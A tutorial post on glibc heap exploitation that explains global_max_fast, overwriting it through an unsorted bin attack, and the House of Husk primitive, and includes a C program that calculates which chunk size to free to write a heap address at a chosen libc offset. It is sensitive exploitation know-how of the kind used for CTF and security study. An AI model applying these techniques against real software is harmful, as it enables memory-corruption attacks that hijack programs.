Here, we are going to cover some more interesting concepts involved in Glibc heap exploitation.

global_max_fast

global_max_fast is a global variable in glibc's malloc that holds the largest chunk size free() will treat as a fast chunk. On 64-bit glibc it defaults to 0x80, so fast chunks have sizes in the range 0x20 to 0x80. If an attacker raises global_max_fast to a large positive value, free() treats chunks of enormous size as fast chunks and links them into a "fastbin" instead of the unsorted, small or large bins, which can then be used to perform a fastbin attack. global_max_fast lives in libc's writable data, so its value can be modified with an Unsorted bin attack: that attack writes a libc address (the address of the unsorted bin head inside main_arena) to a location of the attacker's choice, and any libc address is more than large enough. Note that glibc 2.29 added an integrity check on the unsorted bin ("malloc(): corrupted unsorted chunks 3") that defeats the classic Unsorted bin attack, so this way of raising global_max_fast only works as-is on older versions.

House of Husk

This is an awesome technique developed by ptr-yudai. The default value of global_max_fast is not an arbitrary constant: malloc_init_state sets it through set_max_fast(DEFAULT_MXFAST), where DEFAULT_MXFAST is 64 * SIZE_SZ / 4 (0x80 on 64-bit):

#define set_max_fast(s) \
  global_max_fast = (((s) == 0)                                                      \
                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))

We know that the heads of the fastbins are stored in main_arena, in the fastbinsY array (NFASTBINS = 10 slots on 64-bit, covering sizes 0x20 to 0xb0). When a chunk is freed, _int_free computes its slot as fastbin_index(size) = (size >> 4) - 2 and stores the chunk pointer at &main_arena.fastbinsY[index]; the only bound it checks is size <= global_max_fast, never the index against NFASTBINS. Once global_max_fast is huge, freeing a chunk with a chosen large size therefore writes a heap address at an arbitrary positive offset from fastbinsY: first over the rest of main_arena (top, last_remainder, the normal bins) and, for larger sizes, into whatever libc data follows main_arena. That is the primitive House of Husk builds on: pick the chunk size whose slot coincides with the pointer you want to overwrite. On glibc 2.26 and later remember that free() hands chunks up to size 0x410 to tcache first, so the size you free must either be larger than that or its tcache bin must already be full.
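As an added worked example (not code from this write-up or from ptr-yudai's House of Husk), the following C program models the arithmetic behind the global_max_fast and House of Husk sections above: glibc's set_max_fast and fastbin_index, the address free() writes to once global_max_fast has been raised, the inverse (which chunk size reaches a given libc offset), and the checks that decide whether the write actually lands. It assumes 64-bit glibc; the libc offsets in it are constructed placeholders to be replaced with values read from the target libc, and the helper names (fastbin_write_addr, chunk_size_for_target, plan_write, next_size_ok) are the example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* Constants for 64-bit glibc (assumed target: x86-64, SIZE_SZ == 8). */
#define SIZE_SZ            8ULL
#define MALLOC_ALIGNMENT   (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK  (MALLOC_ALIGNMENT - 1)
#define SMALLBIN_WIDTH     MALLOC_ALIGNMENT
#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)   /* 0x80 */
#define NFASTBINS          10                   /* real fastbinsY[] slots: sizes 0x20..0xb0 */
#define TCACHE_MAX_CHUNK   0x410ULL             /* largest chunk size tcache takes (glibc >= 2.26) */

/* glibc's set_max_fast, as quoted above, applied to our own copy of the variable. */
static uint64_t global_max_fast;
#define set_max_fast(s) \
  (global_max_fast = (((s) == 0) ? SMALLBIN_WIDTH : (((s) + SIZE_SZ) & ~MALLOC_ALIGN_MASK)))

static uint64_t default_global_max_fast(void) { return set_max_fast(DEFAULT_MXFAST); }

/* glibc's fastbin_index: the fastbinsY[] slot for a chunk of size sz (flag bits masked). */
static unsigned fastbin_index(uint64_t sz) { return ((unsigned)sz >> 4) - 2; }

/* Where things live in the target libc. The numbers used below are constructed
 * placeholders; take the real ones from the libc you are attacking
 * (gdb: p &main_arena.fastbinsY, p &<target>). */
struct libc_layout {
    uint64_t main_arena;     /* offset of main_arena in libc */
    uint64_t fastbinsY_off;  /* fastbinsY[] inside main_arena: 0x10 on glibc >= 2.27, 0x8 on 2.23 */
    uint64_t target;         /* offset of the pointer we want overwritten with a heap address */
};

/* free(p) with chunksize(p) == sz <= global_max_fast stores p at
 * &main_arena.fastbinsY[fastbin_index(sz)]; nothing bounds the index by NFASTBINS. */
static uint64_t fastbin_write_addr(const struct libc_layout *l, uint64_t sz) {
    return l->main_arena + l->fastbinsY_off + (uint64_t)fastbin_index(sz) * SIZE_SZ;
}

/* Inverse: the chunk size whose slot is exactly `target`, or 0 if unreachable
 * (target below fastbinsY, or not 8-byte aligned relative to it). */
static uint64_t chunk_size_for_target(const struct libc_layout *l) {
    uint64_t base = l->main_arena + l->fastbinsY_off;
    if (l->target < base || (l->target - base) % SIZE_SZ != 0) return 0;
    return ((l->target - base) / SIZE_SZ + 2) << 4;
}

/* _int_free's sanity check on the fast path ("free(): invalid next size (fast)"):
 * the chunk following ours must have a size > 2*SIZE_SZ and < av->system_mem,
 * so the neighbour of the chunk you free has to be prepared as well. */
static int next_size_ok(uint64_t next_size, uint64_t system_mem) {
    return next_size > 2 * SIZE_SZ && next_size < system_mem;
}

struct plan {
    uint64_t size;                 /* chunk size to free (0: target unreachable) */
    int beyond_default_max_fast;   /* would be refused with the stock 0x80 */
    int beyond_real_fastbins;      /* slot lies past fastbinsY[NFASTBINS - 1] */
    int bypasses_tcache;           /* free() will not divert it into tcache */
    int write_hits_target;         /* free() stores the chunk address at target */
};

static struct plan plan_write(const struct libc_layout *l, uint64_t raised_max_fast) {
    struct plan p = {0, 0, 0, 0, 0};
    p.size = chunk_size_for_target(l);
    if (p.size == 0) return p;
    p.beyond_default_max_fast = p.size > DEFAULT_MXFAST;
    p.beyond_real_fastbins = fastbin_index(p.size) >= NFASTBINS;
    p.bypasses_tcache = p.size > TCACHE_MAX_CHUNK;
    p.write_hits_target = p.size <= raised_max_fast && fastbin_write_addr(l, p.size) == l->target;
    return p;
}

int main(void) {
    /* Constructed layout: main_arena at libc+0x3ebc40, target 0x1000 bytes past fastbinsY. */
    struct libc_layout l = { 0x3ebc40, 0x10, 0x3ecc50 };
    /* A libc address, which is what an unsorted bin attack leaves in global_max_fast. */
    uint64_t raised_max_fast = 0x7f0000000000ULL;
    struct plan p = plan_write(&l, raised_max_fast);
    printf("default global_max_fast = %#llx\n", (unsigned long long)default_global_max_fast());
    printf("free() a chunk of size %#llx -> writes its address to libc+%#llx "
           "(past real fastbins: %d, bypasses tcache: %d)\n",
           (unsigned long long)p.size, (unsigned long long)fastbin_write_addr(&l, p.size),
           p.beyond_real_fastbins, p.bypasses_tcache);
    printf("next chunk size 0x21 with system_mem 0x21000 passes the fast-path check: %d\n",
           next_size_ok(0x21, 0x21000));
    return p.write_hits_target ? 0 : 1;
}
```

With the placeholder layout, a target 0x1000 bytes past fastbinsY needs a chunk of size 0x2020: slot 0x200, far beyond the ten real fastbins, and large enough that tcache does not intercept the free on glibc 2.26+. Swap in the real offsets of main_arena and of the pointer you want to clobber, and the program tells you the size to forge and which checks remain to satisfy.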

To be continued…